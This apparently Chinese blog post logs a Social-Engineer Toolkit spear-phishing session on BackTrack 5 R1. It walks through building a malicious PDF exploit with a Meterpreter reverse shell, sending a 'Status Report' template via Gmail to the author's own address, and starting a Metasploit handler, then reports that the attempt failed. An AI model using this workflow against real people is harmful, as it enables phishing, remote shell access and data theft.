metasploit针对性钓鱼攻击向量（BT5R1失败）

root@root:~# cd /pentest/exploits/set/root@root:/pentest/exploits/set# ./set                 :::===  :::===== :::====                 :::     :::      :::====                  =====  ======     ===                       === ===        ===                   ======  ========   ===    [---]       The Social-Engineer Toolkit (SET)          [---]  [---]        Created by: David Kennedy (ReL1K)         [---]  [---]        Development Team: Thomas Werth            [---]  [---]        Development Team: JR DePre (pr1me)        [---]  [---]        Development Team: Joey Furr (j0fer)       [---]  [---]                Version: 2.0.3                    [---]  [---]           Codename: 'Trebuchet Edition'          [---]  [---]        Report bugs to: davek@secmaniac.com       [---]  [---]         Follow me on Twitter: dave_rel1k         [---]  [---]        Homepage: http://www.secmaniac.com        [---]   Welcome to the Social-Engineer Toolkit (SET). Your one    stop shop for all of your social-engineering needs..        DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.     Join us on irc.freenode.net in channel #setoolkit Select from the menu:   1) Spear-Phishing Attack Vectors   2) Website Attack Vectors   3) Infectious Media Generator   4) Create a Payload and Listener   5) Mass Mailer Attack   6) Arduino-Based Attack Vector   7) SMS Spoofing Attack Vector   8) Wireless Access Point Attack Vector   9) Third Party Modules  10) Update the Metasploit Framework  11) Update the Social-Engineer Toolkit  12) Help, Credits, and About  99) Exit the Social-Engineer Toolkitset > 1 The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is in- stalled (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON. There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!   1) Perform a Mass Email Attack   2) Create a FileFormat Payload   3) Create a Social-Engineering Template  99) Return to Main Menuset:phishing > 1 Select the file format exploit you want. The default is the PDF embedded EXE.           ********** PAYLOADS **********   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)   2) SET Custom Written Document UNC LM SMB Capture Attack   3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow   4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)   5) Adobe Flash Player "Button" Remote Code Execution   6) Adobe CoolType SING Table "uniqueName" Overflow   7) Adobe Flash Player "newfunction" Invalid Pointer Use   8) Adobe Collab.collectEmailInfo Buffer Overflow   9) Adobe Collab.getIcon Buffer Overflow  10) Adobe JBIG2Decode Memory Corruption Exploit  11) Adobe PDF Embedded EXE Social Engineering  12) Adobe util.printf() Buffer Overflow  13) Custom EXE to VBA (sent via RAR) (RAR required)  14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun  15) Adobe PDF Embedded EXE Social Engineering (NOJS)  16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow  17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflowset:payloads > 8   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreterset:payloads > 2set:payloads > Port to connect back on [443]: [-] Defaulting to port 443...[-] Generating fileformat exploit...[*] Payload creation complete.[*] All payloads get sent to the src/program_junk/src/program_junk/template.pdf directory[-] As an added bonus, use the file-format creator in SET to create your attachment.   Right now the attachment will be imported with filename of 'template.whatever'   Do you want to rename the file?   example Enter the new filename: moo.pdf    1. Keep the filename, I don't care.    2. Rename the file, I want to be cool.set:phishing > 1[*] Keeping the filename and moving on.   Social Engineer Toolkit Mass E-Mailer   There are two options on the mass e-mailer, the first would   be to send an email to one individual person. The second option   will allow you to import a list and send it to as many people as   you want within that list.   What do you want to do:   1.  E-Mail Attack Single Email Address   2.  E-Mail Attack Mass Mailer   99. Return to main menu.   set:phishing > 1   Do you want to use a predefined template or craft   a one time email template.    1. Pre-Defined Template   2. One-Time Use Email Templateset:phishing > 1[-] Available templates:1: WOAAAA!!!!!!!!!! This is crazy...2: How long has it been?3: Have you seen this?4: Baby Pics5: Dan Brown's Angels & Demons6: New Update7: Computer Issue8: Status Report9: Strange internet usage from your computerset:phishing > 8set:phishing > Send email to: feier7501@126.com  1. Use a gmail Account for your email attack.  2. Use your own server or open relayset:phishing > 1set:phishing > Your gmail email address: : feier7501@gmail.comEmail password: set:phishing >

set:phishing > Flag this message/s as high priority? [yes|no]: no[*] SET has finished delivering the emailsset:phishing > Setup a listener [yes|no]: Unhandled exception in thread started by 

我输入yes：

yes[-] ***[-] * WARNING: Database support has been disabled[-] ***Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33fEFLAGS: 00010046eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60ds: 0018   es: 0018  ss: 0018Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)Stack: 90909090990909090990909090       90909090990909090990909090       90909090.90909090.90909090       90909090.90909090.90909090       90909090.90909090.09090900       90909090.90909090.09090900       ..........................       cccccccccccccccccccccccccc       cccccccccccccccccccccccccc       ccccccccc.................       cccccccccccccccccccccccccc       cccccccccccccccccccccccccc       .................ccccccccc       cccccccccccccccccccccccccc       cccccccccccccccccccccccccc       ..........................       ffffffffffffffffffffffffff       ffffffff..................       ffffffffffffffffffffffffff       ffffffff..................       ffffffff..................       ffffffff..................Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00Aiee, Killing Interrupt handlerKernel panic: Attempted to kill the idle task!In swapper task - not syncing       =[ metasploit v4.0.0-release [core:4.0 api:1.0]+ -- --=[ 716 exploits - 361 auxiliary - 68 post+ -- --=[ 226 payloads - 27 encoders - 8 nops       =[ svn r13462 updated 652 days ago (2011.08.01)Warning: This copy of the Metasploit Framework was last updated 652 days ago.         We recommend that you update the framework at least every other day.         For information on updating your copy of Metasploit, please see:             https://community.rapid7.com/docs/DOC-1306resource (src/program_junk/meta_config)> use exploit/multi/handlerresource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpresource (src/program_junk/meta_config)> set LHOST 192.168.1.11LHOST => 192.168.1.11resource (src/program_junk/meta_config)> set LPORT 443LPORT => 443resource (src/program_junk/meta_config)> set ENCODING shikata_ga_naiENCODING => shikata_ga_nairesource (src/program_junk/meta_config)> set ExitOnSession falseExitOnSession => falseresource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.msf  exploit(handler) > [*] Started reverse handler on 192.168.1.11:443 [*] Starting the payload handler...

上面抛异常了，而且，我的126的邮箱也没有收到邮件。

版本BT5R1，换个版本试试。